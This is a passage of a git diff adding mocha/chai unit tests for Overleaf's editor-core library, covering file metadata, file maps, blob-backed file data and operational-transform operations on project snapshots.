expect(op.toJSON()).to.deep.equal(raw) + }) + + it('Constructs SetCommentStateOperation from JSON', function () { + const raw = { + commentId: 'comm1', + resolved: true, + } + const op = EditOperationBuilder.fromJSON(raw) + expect(op).to.be.an.instanceof(SetCommentStateOperation) + expect(op.toJSON()).to.deep.equal(raw) + }) + + it('Constructs EditNoOperation from JSON', function () { + const raw = { noOp: true } + const op = EditOperationBuilder.fromJSON(raw) + expect(op).to.be.an.instanceof(EditNoOperation) + expect(op.toJSON()).to.deep.equal(raw) + }) + + it('Throws error for unsupported operation', function () { + const raw = { + unsupportedOperation: { + op: 'foo', + }, + } + expect(() => EditOperationBuilder.fromJSON(raw)).to.throw( + 'Unsupported operation in EditOperationBuilder.fromJSON' + ) + }) + + it('Constructs TextOperation from JSON (randomised)', function () { + const str = random.string(50) + const randomOperation = randomTextOperation(str) + const op = EditOperationBuilder.fromJSON(randomOperation.toJSON()) + expect(op).to.be.an.instanceof(TextOperation) + expect(op.equals(randomOperation)).to.be.true + }) +}) diff --git a/libraries/overleaf-editor-core/test/file.test.js b/libraries/overleaf-editor-core/test/file.test.js new file mode 100644 index 0000000..6c96d97 --- /dev/null +++ b/libraries/overleaf-editor-core/test/file.test.js @@ -0,0 +1,96 @@ +'use strict' + +const { expect } = require('chai') +const FakeBlobStore = require('./support/fake_blob_store') +const ot = require('..') +const File = ot.File + +describe('File', function () { + it('can have attached metadata', function () { + // no metadata + let file = File.fromString('foo') + expect(file.getMetadata()).to.eql({}) + + // metadata passed in at construction time + file = File.fromString('foo', { main: true }) + expect(file.getMetadata()).to.eql({ main: true }) + + // metadata set at runtime + file.setMetadata({ main: false }) + expect(file.getMetadata()).to.eql({ main: false }) + }) + + describe('toRaw', function () { + it('returns non-empty metadata', function () { + const metadata = { main: true } + const file = File.fromHash(File.EMPTY_FILE_HASH, undefined, metadata) + expect(file.toRaw()).to.eql({ + hash: File.EMPTY_FILE_HASH, + metadata, + }) + + delete file.getMetadata().main + expect(file.toRaw()).to.eql({ hash: File.EMPTY_FILE_HASH }) + }) + + it('returns a deep clone of metadata', function () { + const metadata = { externalFile: { id: 123 } } + const file = File.fromHash(File.EMPTY_FILE_HASH, undefined, metadata) + const raw = file.toRaw() + const fileMetadata = file.getMetadata() + const rawMetadata = raw.metadata + expect(rawMetadata).not.to.equal(fileMetadata) + expect(rawMetadata).to.deep.equal(fileMetadata) + }) + }) + + describe('store', function () { + it('does not return empty metadata', async function () { + const file = File.fromHash(File.EMPTY_FILE_HASH) + const fakeBlobStore = new FakeBlobStore() + const raw = await file.store(fakeBlobStore) + expect(raw).to.eql({ hash: File.EMPTY_FILE_HASH }) + }) + + it('returns non-empty metadata', async function () { + const metadata = { main: true } + const file = File.fromHash(File.EMPTY_FILE_HASH, undefined, metadata) + const fakeBlobStore = new FakeBlobStore() + const raw = await file.store(fakeBlobStore) + expect(raw).to.eql({ + hash: File.EMPTY_FILE_HASH, + metadata, + }) + }) + + it('returns a deep clone of metadata', async function () { + const metadata = { externalFile: { id: 123 } } + const file = File.fromHash(File.EMPTY_FILE_HASH, undefined, metadata) + const fakeBlobStore = new FakeBlobStore() + const raw = await file.store(fakeBlobStore) + raw.metadata.externalFile.id = 456 + expect(file.getMetadata().externalFile.id).to.equal(123) + }) + }) + + describe('with string data', function () { + it('can be created from a string', function () { + const file = File.fromString('foo') + expect(file.getContent()).to.equal('foo') + }) + }) + + describe('with hollow string data', function () { + it('can be cloned', function () { + const file = File.createHollow(null, 0) + expect(file.getStringLength()).to.equal(0) + const clone = file.clone() + expect(clone.getStringLength()).to.equal(0) + }) + }) + + it('getComments() returns an empty comment list', function () { + const file = File.fromString('foo') + expect(file.getComments().toRaw()).to.eql([]) + }) +}) diff --git a/libraries/overleaf-editor-core/test/file_map.test.js b/libraries/overleaf-editor-core/test/file_map.test.js new file mode 100644 index 0000000..7dc1b70 --- /dev/null +++ b/libraries/overleaf-editor-core/test/file_map.test.js @@ -0,0 +1,195 @@ +'use strict' + +const { expect } = require('chai') +const _ = require('lodash') + +const ot = require('..') +const File = ot.File +const FileMap = ot.FileMap + +describe('FileMap', function () { + function makeTestFile(pathname) { + return File.fromString(pathname) + } + + function makeTestFiles(pathnames) { + return _.zipObject(pathnames, _.map(pathnames, makeTestFile)) + } + + function makeFileMap(pathnames) { + return new FileMap(makeTestFiles(pathnames)) + } + + it('allows construction with a single file', function () { + makeFileMap(['a']) + }) + + it('allows folders to differ by case', function () { + expect(() => { + makeFileMap(['a/b', 'A/c']) + }).not.to.throw + expect(() => { + makeFileMap(['a/b/c', 'A/b/d']) + }).not.to.throw + expect(() => { + makeFileMap(['a/b/c', 'a/B/d']) + }).not.to.throw + }) + + it('does not allow conflicting paths on construct', function () { + expect(() => { + makeFileMap(['a', 'a/b']) + }).to.throw(FileMap.PathnameConflictError) + }) + + it('detects conflicting paths with characters that sort before /', function () { + const fileMap = makeFileMap(['a', 'a!']) + expect(fileMap.wouldConflict('a/b')).to.be.truthy + }) + + it('detects conflicting paths', function () { + const fileMap = makeFileMap(['a/b/c']) + expect(fileMap.wouldConflict('a/b/c/d')).to.be.truthy + expect(fileMap.wouldConflict('a')).to.be.truthy + expect(fileMap.wouldConflict('b')).to.be.falsy + expect(fileMap.wouldConflict('a/b')).to.be.truthy + expect(fileMap.wouldConflict('a/c')).to.be.falsy + expect(fileMap.wouldConflict('a/b/c')).to.be.falsy + expect(fileMap.wouldConflict('a/b/d')).to.be.falsy + expect(fileMap.wouldConflict('d/b/c')).to.be.falsy + }) + + it('allows paths that differ by case', function () { + const fileMap = makeFileMap(['a/b/c']) + expect(fileMap.wouldConflict('a/b/C')).to.be.falsy + expect(fileMap.wouldConflict('A')).to.be.falsy + expect(fileMap.wouldConflict('A/b')).to.be.falsy + expect(fileMap.wouldConflict('a/B')).to.be.falsy + expect(fileMap.wouldConflict('A/B')).to.be.falsy + }) + + it('does not add a file with a conflicting path', function () { + const fileMap = makeFileMap(['a/b']) + const file = makeTestFile('a/b/c') + + expect(() => { + fileMap.addFile('a/b/c', file) + }).to.throw(FileMap.PathnameConflictError) + }) + + it('does not move a file to a conflicting path', function () { + const fileMap = makeFileMap(['a/b', 'a/c']) + + expect(() => { + fileMap.moveFile('a/b', 'a') + }).to.throw(FileMap.PathnameConflictError) + }) + + it('errors when trying to move a non-existent file', function () { + const fileMap = makeFileMap(['a']) + expect(() => fileMap.moveFile('b', 'a')).to.throw(FileMap.FileNotFoundError) + }) + + it('moves a file over an empty folder', function () { + const fileMap = makeFileMap(['a/b']) + fileMap.moveFile('a/b', 'a') + expect(fileMap.countFiles()).to.equal(1) + expect(fileMap.getFile('a')).to.exist + expect(fileMap.getFile('a').getContent()).to.equal('a/b') + }) + + it('does not move a file over a non-empty folder', function () { + const fileMap = makeFileMap(['a/b', 'a/c']) + expect(() => { + fileMap.moveFile('a/b', 'a') + }).to.throw(FileMap.PathnameConflictError) + }) + + it('does not overwrite filename that differs by case on add', function () { + const fileMap = makeFileMap(['a']) + fileMap.addFile('A', makeTestFile('A')) + expect(fileMap.countFiles()).to.equal(2) + expect(fileMap.files.a).to.exist + expect(fileMap.files.A).to.exist + expect(fileMap.getFile('a')).to.exist + expect(fileMap.getFile('A').getContent()).to.equal('A') + }) + + it('changes case on move', function () { + const fileMap = makeFileMap(['a']) + fileMap.moveFile('a', 'A') + expect(fileMap.countFiles()).to.equal(1) + expect(fileMap.files.a).not.to.exist + expect(fileMap.files.A).to.exist + expect(fileMap.getFile('A').getContent()).to.equal('a') + }) + + it('does not overwrite filename that differs by case on move', function () { + const fileMap = makeFileMap(['a', 'b']) + fileMap.moveFile('a', 'B') + expect(fileMap.countFiles()).to.equal(2) + expect(fileMap.files.a).not.to.exist + expect(fileMap.files.b).to.exist + expect(fileMap.files.B).to.exist + expect(fileMap.getFile('B').getContent()).to.equal('a') + }) + + it('does not find pathname that differs by case', function () { + const fileMap = makeFileMap(['a']) + expect(fileMap.getFile('a')).to.exist + expect(fileMap.getFile('A')).not.to.exist + expect(fileMap.getFile('b')).not.to.exist + }) + + it('does not allow non-safe pathnames', function () { + expect(() => { + makeFileMap(['c*']) + }).to.throw(FileMap.BadPathnameError) + + const fileMap = makeFileMap([]) + + expect(() => { + fileMap.addFile('c*', makeTestFile('c:')) + }).to.throw(FileMap.BadPathnameError) + + fileMap.addFile('a', makeTestFile('a')) + expect(() => { + fileMap.moveFile('a', 'c*') + }).to.throw(FileMap.BadPathnameError) + + expect(() => { + fileMap.addFile('hasOwnProperty', makeTestFile('hasOwnProperty')) + fileMap.addFile('anotherFile', makeTestFile('anotherFile')) + }).to.throw() + }) + + it('removes a file', function () { + const fileMap = makeFileMap(['a', 'b']) + fileMap.removeFile('a') + expect(fileMap.countFiles()).to.equal(1) + expect(fileMap.files.a).not.to.exist + expect(fileMap.files.b).to.exist + }) + + it('errors when trying to remove a non-existent file', function () { + const fileMap = makeFileMap(['a']) + expect(() => fileMap.removeFile('b')).to.throw(FileMap.FileNotFoundError) + }) + + it('has mapAsync', async function () { + const concurrency = 1 + for (const test of [ + [[], {}], + [['a'], { a: 'a-a' }], // the test is to map to "content-pathname" + [['a', 'b'], { a: 'a-a', b: 'b-b' }], + ]) { + const input = test[0] + const expectedOutput = test[1] + const fileMap = makeFileMap(input) + const result = await fileMap.mapAsync((file, pathname) => { + return file.getContent() + '-' + pathname + }, concurrency) + expect(result).to.deep.equal(expectedOutput) + } + }) +}) diff --git a/libraries/overleaf-editor-core/test/hash_file_data.test.js b/libraries/overleaf-editor-core/test/hash_file_data.test.js new file mode 100644 index 0000000..cf7ff56 --- /dev/null +++ b/libraries/overleaf-editor-core/test/hash_file_data.test.js @@ -0,0 +1,124 @@ +const HashFileData = require('../lib/file_data/hash_file_data') +const { expect } = require('chai') +const StringFileData = require('../lib/file_data/string_file_data') +const sinon = require('sinon') +const Blob = require('../lib/blob') + +describe('HashFileData', function () { + beforeEach(function () { + this.fileHash = 'a5675307b61ec2517330622a6e649b4ca1ee5612' + this.rangesHash = '380de212d09bf8498065833dbf242aaf11184316' + this.blobStore = { + getString: sinon.stub(), + getObject: sinon.stub(), + getBlob: sinon.stub(), + } + }) + + describe('constructor', function () { + it('should create a new instance of HashFileData from content hash and ranges hash', function () { + const fileData = new HashFileData(this.fileHash, this.rangesHash) + + expect(fileData).to.be.instanceOf(HashFileData) + expect(fileData.getHash()).to.equal(this.fileHash) + expect(fileData.getRangesHash()).to.equal(this.rangesHash) + }) + + it('should create a new instance of HashFileData with no ranges hash', function () { + const fileData = new HashFileData(this.fileHash) + expect(fileData).to.be.instanceOf(HashFileData) + expect(fileData.getHash()).to.equal(this.fileHash) + expect(fileData.getRangesHash()).to.be.undefined + }) + }) + + describe('fromRaw', function () { + it('should create a new instance of HashFileData from raw data', function () { + const raw = { hash: this.fileHash, rangesHash: this.rangesHash } + const fileData = HashFileData.fromRaw(raw) + + expect(fileData).to.be.instanceOf(HashFileData) + expect(fileData.getHash()).to.equal(raw.hash) + expect(fileData.getRangesHash()).to.equal(raw.rangesHash) + }) + + it('should create a new instance of HashFileData from raw data without ranges hash', function () { + const raw = { hash: this.fileHash } + const fileData = HashFileData.fromRaw(raw) + + expect(fileData).to.be.instanceOf(HashFileData) + expect(fileData.getHash()).to.equal(raw.hash) + expect(fileData.getRangesHash()).to.equal(undefined) + }) + }) + + describe('toRaw', function () { + it('should include ranges hash when present', function () { + const fileData = new HashFileData(this.fileHash, this.rangesHash) + const raw = fileData.toRaw() + expect(raw).to.deep.equal({ + hash: this.fileHash, + rangesHash: this.rangesHash, + }) + }) + + it('should omit ranges hash when not present', function () { + const fileData = new HashFileData(this.fileHash) + const raw = fileData.toRaw() + expect(raw).to.deep.equal({ + hash: this.fileHash, + }) + }) + }) + + describe('toEager', function () { + it('should convert HashFileData to StringFileData including ranges', async function () { + const trackedChanges = [ + { + range: { pos: 5, length: 10 }, + tracking: { + userId: 'foo', + type: 'insert', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ] + const comments = [ + { + id: 'comment-1', + ranges: [{ pos: 1, length: 4 }], + }, + ] + const fileData = new HashFileData(this.fileHash, this.rangesHash) + this.blobStore.getString.withArgs(this.fileHash).resolves('content') + this.blobStore.getObject.withArgs(this.rangesHash).resolves({ + trackedChanges, + comments, + }) + this.blobStore.getBlob + .withArgs(this.rangesHash) + .resolves(new Blob(this.rangesHash, 20, 20)) + this.blobStore.getBlob + .withArgs(this.fileHash) + .resolves(new Blob(this.fileHash, 20, 20)) + const eagerFileData = await fileData.toEager(this.blobStore) + expect(eagerFileData).to.be.instanceOf(StringFileData) + expect(eagerFileData.getContent()).to.equal('content') + expect(eagerFileData.trackedChanges.toRaw()).to.deep.equal(trackedChanges) + expect(eagerFileData.getComments().toRaw()).to.deep.equal(comments) + }) + + it('should convert HashFileData to StringFileData without ranges', async function () { + const fileData = new HashFileData(this.fileHash, undefined) + this.blobStore.getString.withArgs(this.fileHash).resolves('content') + this.blobStore.getBlob + .withArgs(this.fileHash) + .resolves(new Blob(this.fileHash, 20, 20)) + const eagerFileData = await fileData.toEager(this.blobStore) + expect(eagerFileData).to.be.instanceOf(StringFileData) + expect(eagerFileData.getContent()).to.equal('content') + expect(eagerFileData.trackedChanges.toRaw()).to.deep.equal([]) + expect(eagerFileData.getComments().toRaw()).to.deep.equal([]) + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/history.test.js b/libraries/overleaf-editor-core/test/history.test.js new file mode 100644 index 0000000..c5be9d8 --- /dev/null +++ b/libraries/overleaf-editor-core/test/history.test.js @@ -0,0 +1,42 @@ +'use strict' + +const { expect } = require('chai') +const core = require('..') +const Change = core.Change +const File = core.File +const History = core.History +const Operation = core.Operation +const Snapshot = core.Snapshot + +describe('History', function () { + describe('findBlobHashes', function () { + it('finds blob hashes from snapshot and changes', function () { + const history = new History(new Snapshot(), []) + + const blobHashes = new Set() + history.findBlobHashes(blobHashes) + expect(blobHashes.size).to.equal(0) + + // Add a file with a hash to the snapshot. + history.getSnapshot().addFile('foo', File.fromHash(File.EMPTY_FILE_HASH)) + history.findBlobHashes(blobHashes) + expect(Array.from(blobHashes)).to.have.members([File.EMPTY_FILE_HASH]) + + // Add a file with a hash to the changes. + const testHash = 'a'.repeat(40) + const change = Change.fromRaw({ + operations: [], + timestamp: '2015-03-05T12:03:53.035Z', + authors: [null], + }) + change.pushOperation(Operation.addFile('bar', File.fromHash(testHash))) + + history.pushChanges([change]) + history.findBlobHashes(blobHashes) + expect(Array.from(blobHashes)).to.have.members([ + File.EMPTY_FILE_HASH, + testHash, + ]) + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/hollow_string_file_data.test.js b/libraries/overleaf-editor-core/test/hollow_string_file_data.test.js new file mode 100644 index 0000000..e40fec2 --- /dev/null +++ b/libraries/overleaf-editor-core/test/hollow_string_file_data.test.js @@ -0,0 +1,22 @@ +'use strict' + +const { expect } = require('chai') +const ot = require('..') +const HollowStringFileData = require('../lib/file_data/hollow_string_file_data') +const TextOperation = ot.TextOperation + +describe('HollowStringFileData', function () { + it('validates string length when edited', function () { + const maxLength = TextOperation.MAX_STRING_LENGTH + const fileData = new HollowStringFileData(maxLength) + expect(fileData.getStringLength()).to.equal(maxLength) + + expect(() => { + fileData.edit(new TextOperation().retain(maxLength).insert('x')) + }).to.throw(TextOperation.TooLongError) + expect(fileData.getStringLength()).to.equal(maxLength) + + fileData.edit(new TextOperation().retain(maxLength - 1).remove(1)) + expect(fileData.getStringLength()).to.equal(maxLength - 1) + }) +}) diff --git a/libraries/overleaf-editor-core/test/label.test.js b/libraries/overleaf-editor-core/test/label.test.js new file mode 100644 index 0000000..448b6f0 --- /dev/null +++ b/libraries/overleaf-editor-core/test/label.test.js @@ -0,0 +1,17 @@ +'use strict' + +const { expect } = require('chai') +const ot = require('..') +const Label = ot.Label + +describe('Label', function () { + it('can be created by an anonymous author', function () { + const label = Label.fromRaw({ + text: 'test', + authorId: null, + timestamp: '2016-01-01T00:00:00Z', + version: 123, + }) + expect(label.getAuthorId()).to.be.null + }) +}) diff --git a/libraries/overleaf-editor-core/test/lazy_string_file_data.test.js b/libraries/overleaf-editor-core/test/lazy_string_file_data.test.js new file mode 100644 index 0000000..4c9f4aa --- /dev/null +++ b/libraries/overleaf-editor-core/test/lazy_string_file_data.test.js @@ -0,0 +1,196 @@ +// @ts-check +'use strict' + +const _ = require('lodash') +const { expect } = require('chai') +const sinon = require('sinon') + +const ot = require('..') +const File = ot.File +const TextOperation = ot.TextOperation +const LazyStringFileData = require('../lib/file_data/lazy_string_file_data') +const EagerStringFileData = require('../lib/file_data/string_file_data') + +describe('LazyStringFileData', function () { + beforeEach(function () { + this.rangesHash = '380de212d09bf8498065833dbf242aaf11184316' + this.fileHash = 'a5675307b61ec2517330622a6e649b4ca1ee5612' + this.blobStore = { + getString: sinon.stub(), + putString: sinon.stub().resolves(new ot.Blob(this.fileHash, 19, 19)), + getObject: sinon.stub(), + putObject: sinon.stub().resolves(new ot.Blob(this.rangesHash, 204, 204)), + } + this.blobStore.getString.withArgs(File.EMPTY_FILE_HASH).resolves('') + this.blobStore.getString + .withArgs(this.fileHash) + .resolves('the quick brown fox') + this.blobStore.getObject.withArgs(this.rangesHash).resolves({ + comments: [{ id: 'foo', ranges: [{ pos: 0, length: 3 }] }], + trackedChanges: [ + { + range: { pos: 4, length: 5 }, + tracking: { + type: 'delete', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ], + }) + }) + + it('uses raw text operations for toRaw and fromRaw', function () { + const testHash = File.EMPTY_FILE_HASH + const fileData = new LazyStringFileData(testHash, undefined, 0) + let roundTripFileData + + expect(fileData.toRaw()).to.deep.equal({ + hash: testHash, + stringLength: 0, + }) + roundTripFileData = LazyStringFileData.fromRaw(fileData.toRaw()) + expect(roundTripFileData.getHash()).to.equal(testHash) + expect(roundTripFileData.getStringLength()).to.equal(0) + expect(roundTripFileData.getOperations()).to.have.length(0) + + fileData.edit(new TextOperation().insert('a')) + expect(fileData.toRaw()).to.deep.equal({ + hash: testHash, + stringLength: 1, + operations: [{ textOperation: ['a'] }], + }) + roundTripFileData = LazyStringFileData.fromRaw(fileData.toRaw()) + expect(roundTripFileData.getHash()).not.to.exist // file has changed + expect(roundTripFileData.getStringLength()).to.equal(1) + expect(roundTripFileData.getOperations()).to.have.length(1) + expect(roundTripFileData.getOperations()[0]).to.be.instanceOf(TextOperation) + expect( + /** @type {InstanceType} */ ( + roundTripFileData.getOperations()[0] + ).ops + ).to.have.length(1) + + fileData.edit(new TextOperation().retain(1).insert('b')) + expect(fileData.toRaw()).to.deep.equal({ + hash: testHash, + stringLength: 2, + operations: [{ textOperation: ['a'] }, { textOperation: [1, 'b'] }], + }) + roundTripFileData = LazyStringFileData.fromRaw(fileData.toRaw()) + expect(roundTripFileData.getHash()).not.to.exist // file has changed + expect(roundTripFileData.getStringLength()).to.equal(2) + expect(roundTripFileData.getOperations()).to.have.length(2) + expect( + /** @type {InstanceType} */ ( + roundTripFileData.getOperations()[0] + ).ops + ).to.have.length(1) + expect( + /** @type {InstanceType} */ ( + roundTripFileData.getOperations()[1] + ).ops + ).to.have.length(2) + }) + + it('should include rangesHash in toRaw and fromRaw when available', function () { + const testHash = File.EMPTY_FILE_HASH + const rangesHash = this.rangesHash + const fileData = new LazyStringFileData(testHash, rangesHash, 19) + + expect(fileData.toRaw()).to.deep.equal({ + hash: testHash, + rangesHash, + stringLength: 19, + }) + + const roundTripFileData = LazyStringFileData.fromRaw(fileData.toRaw()) + expect(roundTripFileData.getHash()).to.equal(testHash) + expect(roundTripFileData.getRangesHash()).to.equal(rangesHash) + expect(roundTripFileData.getStringLength()).to.equal(19) + expect(roundTripFileData.getOperations()).to.have.length(0) + }) + + it('should fetch content from blob store when loading eager string', async function () { + const testHash = this.fileHash + const rangesHash = this.rangesHash + const fileData = new LazyStringFileData(testHash, rangesHash, 19) + const eagerString = await fileData.toEager(this.blobStore) + expect(eagerString).to.be.instanceOf(EagerStringFileData) + expect(eagerString.getContent()).to.equal('the quick brown fox') + expect(eagerString.getComments().toRaw()).to.deep.equal([ + { id: 'foo', ranges: [{ pos: 0, length: 3 }] }, + ]) + expect(eagerString.trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 4, length: 5 }, + tracking: { + type: 'delete', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + expect(this.blobStore.getObject.calledWith(rangesHash)).to.be.true + expect(this.blobStore.getString.calledWith(testHash)).to.be.true + }) + + it('should not fetch ranges from blob store if not present', async function () { + const testHash = this.fileHash + const fileData = new LazyStringFileData(testHash, undefined, 19) + const eagerString = await fileData.toEager(this.blobStore) + expect(eagerString).to.be.instanceOf(EagerStringFileData) + expect(eagerString.getContent()).to.equal('the quick brown fox') + expect(eagerString.getComments().toRaw()).to.be.empty + expect(eagerString.trackedChanges.length).to.equal(0) + expect(this.blobStore.getObject.called).to.be.false + expect(this.blobStore.getString.calledWith(testHash)).to.be.true + }) + + it('validates operations when edited', function () { + const testHash = File.EMPTY_FILE_HASH + const fileData = new LazyStringFileData(testHash, undefined, 0) + expect(fileData.getHash()).equal(testHash) + expect(fileData.getByteLength()).to.equal(0) // approximately + expect(fileData.getStringLength()).to.equal(0) + expect(fileData.getOperations()).to.have.length(0) + + fileData.edit(new TextOperation().insert('a')) + expect(fileData.getHash()).not.to.exist + expect(fileData.getByteLength()).to.equal(1) // approximately + expect(fileData.getStringLength()).to.equal(1) + expect(fileData.getOperations()).to.have.length(1) + + expect(() => { + fileData.edit(new TextOperation().retain(10)) + }).to.throw(TextOperation.ApplyError) + expect(fileData.getHash()).not.to.exist + expect(fileData.getByteLength()).to.equal(1) // approximately + expect(fileData.getStringLength()).to.equal(1) + expect(fileData.getOperations()).to.have.length(1) + }) + + it('validates string length when edited', function () { + const testHash = File.EMPTY_FILE_HASH + const fileData = new LazyStringFileData(testHash, undefined, 0) + expect(fileData.getHash()).equal(testHash) + expect(fileData.getByteLength()).to.equal(0) // approximately + expect(fileData.getStringLength()).to.equal(0) + expect(fileData.getOperations()).to.have.length(0) + + const longString = _.repeat('a', TextOperation.MAX_STRING_LENGTH) + fileData.edit(new TextOperation().insert(longString)) + expect(fileData.getHash()).not.to.exist + expect(fileData.getByteLength()).to.equal(longString.length) // approximate + expect(fileData.getStringLength()).to.equal(longString.length) + expect(fileData.getOperations()).to.have.length(1) + + expect(() => { + fileData.edit(new TextOperation().retain(longString.length).insert('x')) + }).to.throw(TextOperation.TooLongError) + expect(fileData.getHash()).not.to.exist + expect(fileData.getByteLength()).to.equal(longString.length) // approximate + expect(fileData.getStringLength()).to.equal(longString.length) + expect(fileData.getOperations()).to.have.length(1) + }) +}) diff --git a/libraries/overleaf-editor-core/test/move_file_operation.test.js b/libraries/overleaf-editor-core/test/move_file_operation.test.js new file mode 100644 index 0000000..d8bf923 --- /dev/null +++ b/libraries/overleaf-editor-core/test/move_file_operation.test.js @@ -0,0 +1,64 @@ +'use strict' + +const { expect } = require('chai') +const ot = require('..') +const File = ot.File +const MoveFileOperation = ot.MoveFileOperation +const Snapshot = ot.Snapshot +const Operation = ot.Operation +const V2DocVersions = ot.V2DocVersions +const TextOperation = ot.TextOperation + +describe('MoveFileOperation', function () { + function makeEmptySnapshot() { + return new Snapshot() + } + + function makeOneFileSnapshot() { + const snapshot = makeEmptySnapshot() + snapshot.addFile('foo', File.fromString('test: foo')) + return snapshot + } + + function makeTwoFileSnapshot() { + const snapshot = makeOneFileSnapshot() + snapshot.addFile('bar', File.fromString('test: bar')) + return snapshot + } + + it('moves a file over another', function () { + const snapshot = makeOneFileSnapshot() + const operation = new MoveFileOperation('foo', 'bar') + operation.applyTo(snapshot) + expect(snapshot.countFiles()).to.equal(1) + expect(snapshot.getFile('bar').getContent()).to.equal('test: foo') + }) + + it('moves a file to another pathname', function () { + const snapshot = makeTwoFileSnapshot() + const operation = new MoveFileOperation('foo', 'a') + operation.applyTo(snapshot) + expect(snapshot.countFiles()).to.equal(2) + expect(snapshot.getFile('a').getContent()).to.equal('test: foo') + expect(snapshot.getFile('bar').getContent()).to.equal('test: bar') + }) + + it('should keep v2DocVersions in-sync', function () { + const snapshot = makeTwoFileSnapshot() + snapshot.setV2DocVersions( + V2DocVersions.fromRaw({ + id1: { pathname: 'foo', v: 1 }, + id2: { pathname: 'bar', v: 1 }, + }) + ) + Operation.moveFile('foo', 'foo-after').applyTo(snapshot) + Operation.editFile( + 'foo-after', + TextOperation.fromJSON({ textOperation: [9, 'edit'] }) + ).applyTo(snapshot) + Operation.removeFile('bar').applyTo(snapshot) + expect(snapshot.getV2DocVersions().toRaw()).to.deep.equal({ + id1: { pathname: 'foo-after', v: 1 }, + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/operation.test.js b/libraries/overleaf-editor-core/test/operation.test.js new file mode 100644 index 0000000..c2edc66 --- /dev/null +++ b/libraries/overleaf-editor-core/test/operation.test.js @@ -0,0 +1,1074 @@ +'use strict' + +const _ = require('lodash') +const { expect } = require('chai') + +const ot = require('..') +const StringFileData = require('../lib/file_data/string_file_data') +const File = ot.File +const AddFileOperation = ot.AddFileOperation +const MoveFileOperation = ot.MoveFileOperation +const EditFileOperation = ot.EditFileOperation +const NoOperation = ot.NoOperation +const Operation = ot.Operation +const TextOperation = ot.TextOperation +const AddCommentOperation = ot.AddCommentOperation +const DeleteCommentOperation = ot.DeleteCommentOperation +const SetCommentStateOperation = ot.SetCommentStateOperation +const Snapshot = ot.Snapshot + +describe('Operation', function () { + function makeEmptySnapshot() { + return new Snapshot() + } + + function makeOneFileSnapshot() { + const snapshot = makeEmptySnapshot() + snapshot.addFile('foo', File.fromString('')) + return snapshot + } + + function makeTwoFileSnapshot() { + const snapshot = makeOneFileSnapshot() + snapshot.addFile('bar', File.fromString('a')) + return snapshot + } + + function addFile(pathname, content) { + return new AddFileOperation(pathname, File.fromString(content)) + } + + function roundTripOperation(operation) { + return Operation.fromRaw(operation.toRaw()) + } + + function deepCopySnapshot(snapshot) { + return Snapshot.fromRaw(snapshot.toRaw()) + } + + function runConcurrently(operation0, operation1, snapshot) { + const operations = [ + // make sure they survive serialization + roundTripOperation(operation0), + roundTripOperation(operation1), + ] + const primeOperations = Operation.transform(operation0, operation1) + const originalSnapshot = snapshot || makeEmptySnapshot() + const snapshotA = deepCopySnapshot(originalSnapshot) + const snapshotB = deepCopySnapshot(originalSnapshot) + + operations[0].applyTo(snapshotA) + operations[1].applyTo(snapshotB) + + primeOperations[0].applyTo(snapshotB) + primeOperations[1].applyTo(snapshotA) + expect(snapshotA).to.eql(snapshotB) + + return { + snapshot: snapshotA, + operations, + primeOperations, + + log() { + console.log(this) + return this + }, + + expectNoTransform() { + expect(this.operations).to.deep.eql(this.primeOperations) + return this + }, + + expectTransform() { + expect(this.operations).to.not.deep.eql(this.primeOperations) + return this + }, + + swap() { + return runConcurrently(operation1, operation0, originalSnapshot) + }, + + expectFiles(files) { + this.expectedFiles = files + expect(this.snapshot.countFiles()).to.equal(_.size(files)) + _.forOwn(files, (expectedFile, pathname) => { + if (_.isString(expectedFile)) { + expectedFile = { content: expectedFile, metadata: {}, comments: [] } + } + const file = this.snapshot.getFile(pathname) + expect(file.getContent()).to.equal(expectedFile.content) + expect(file.getMetadata()).to.eql(expectedFile.metadata) + expect(file.getComments().toRaw()).to.deep.equal( + expectedFile.comments + ) + }) + return this + }, + + expectSymmetry() { + if (!this.expectedFiles) { + throw new Error('must call expectFiles before expectSymmetry') + } + this.swap().expectFiles(this.expectedFiles) + return this + }, + + expectPrime(index, klass) { + expect(this.primeOperations[index]).to.be.an.instanceof(klass) + return this + }, + + tap(fn) { + fn.call(this) + return this + }, + } + } + + // shorthand for creating an edit operation + function edit(pathname, textOperationOps) { + return Operation.editFile( + pathname, + TextOperation.fromJSON({ textOperation: textOperationOps }) + ) + } + + it('transforms AddFile-AddFile with different names', function () { + runConcurrently(addFile('foo', ''), addFile('bar', 'a')) + .expectNoTransform() + .expectFiles({ bar: 'a', foo: '' }) + .expectSymmetry() + }) + + it('transforms AddFile-AddFile with same name', function () { + // the second file 'wins' + runConcurrently(addFile('foo', ''), addFile('foo', 'a')) + .expectFiles({ foo: 'a' }) + // if the first add was committed first, the second add overwrites it + .expectPrime(1, AddFileOperation) + // if the second add was committed first, the first add becomes a no-op + .expectPrime(0, NoOperation) + .swap() + .expectFiles({ foo: '' }) + }) + + it('transforms AddFile-MoveFile with no conflict', function () { + runConcurrently( + Operation.moveFile('foo', 'baz'), + addFile('bar', 'a'), + makeOneFileSnapshot() + ) + .expectNoTransform() + .expectFiles({ bar: 'a', baz: '' }) + .expectSymmetry() + }) + + it('transforms AddFile-MoveFile with move from new file', function () { + runConcurrently( + Operation.moveFile('foo', 'baz'), + addFile('foo', 'a'), + makeOneFileSnapshot() + ) + .expectFiles({ baz: 'a' }) + // if the move was committed first, the add overwrites it + .expectPrime(1, AddFileOperation) + // if the add was committed first, the move appears in the history + .expectPrime(0, MoveFileOperation) + .expectSymmetry() + }) + + it('transforms AddFile-MoveFile with move to new file', function () { + runConcurrently( + Operation.moveFile('foo', 'baz'), + addFile('baz', 'a'), + makeOneFileSnapshot() + ) + .expectFiles({ baz: 'a' }) + // if the move was committed first, the add overwrites it + .expectPrime(1, AddFileOperation) + // if the add was committed first, the move becomes a delete + .expectPrime(0, MoveFileOperation) + .tap(function () { + expect(this.primeOperations[0].isRemoveFile()).to.be.true + }) + .expectSymmetry() + }) + + it('transforms AddFile-RemoveFile with no conflict', function () { + runConcurrently( + Operation.removeFile('foo'), + addFile('bar', 'a'), + makeOneFileSnapshot() + ) + .expectNoTransform() + .expectFiles({ bar: 'a' }) + .expectSymmetry() + 